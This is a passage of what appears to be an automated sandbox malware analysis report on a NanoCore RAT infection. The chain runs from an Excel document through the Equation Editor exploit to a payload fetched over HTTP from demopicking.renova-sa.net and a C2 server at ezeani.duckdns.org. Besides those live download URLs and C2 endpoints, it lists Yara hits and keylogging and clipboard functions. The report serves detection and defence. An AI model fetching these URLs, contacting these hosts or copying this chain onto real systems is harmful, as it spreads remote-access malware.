losedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: mmuiqlcvwo.pif, 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0101C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	5_2_0101C06C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_010265D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	5_2_010265D3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	5_2_01014EFB

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.48	ezeani.duckdns.org	Netherlands		208476	DANILENKODE	true
97.107.138.110	demopicking.renova-sa.net	United States		63949	LINODE-APLinodeLLCUS	true

Contacted Domains

Name	IP	Active
ezeani.duckdns.org	194.5.98.48	true
demopicking.renova-sa.net	97.107.138.110	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://demopicking.renova-sa.net/asdERTYgh56F.exe	true	Avira URL Cloud: safe	unknown
ezeani.duckdns.org	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
194.5.98.48	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://demopicking.renova-sa.net/asdERTYgh56F.exe	true	Avira URL Cloud: safe	unknown

AV Detection:

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Found malware configuration

Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp

Multi AV Scanner detection for dropped file

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Virustotal: Detection: 27%			Perma Link
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	ReversingLabs: Detection: 32%

Antivirus or Machine Learning detection for unpacked file

Source: 6.2.RegSvcs.exe.ae0000.4.unpack	Avira: Label: TR/NanoCore.fadte
Source: 6.2.RegSvcs.exe.340000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.2.RegSvcs.exe.2d0000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0026A2DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0027AFB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,	4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,	5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,	5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00FFBF17

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 97.107.138.110:80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: demopicking.renova-sa.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 97.107.138.110:443

Networking:

Uses dynamic DNS services

Source: unknown

DNS query: name: ezeani.duckdns.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ezeani.duckdns.org
Source: Malware configuration extractor	URLs: 194.5.98.48

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 194.5.98.48 194.5.98.48

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 194.5.98.48:8338

Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/03
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository09
Source: asdERTYgh56F[1].htm.2.dr	String found in binary or memory: https://demopicking.renova-sa.net/asdERTYgh56F.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: demopicking.renova-sa.net

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF2285 InternetQueryDataAvailable,InternetReadFile,

5_2_00FF2285

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01006308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

5_2_01006308

Contains functionality for read data from the clipboard

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

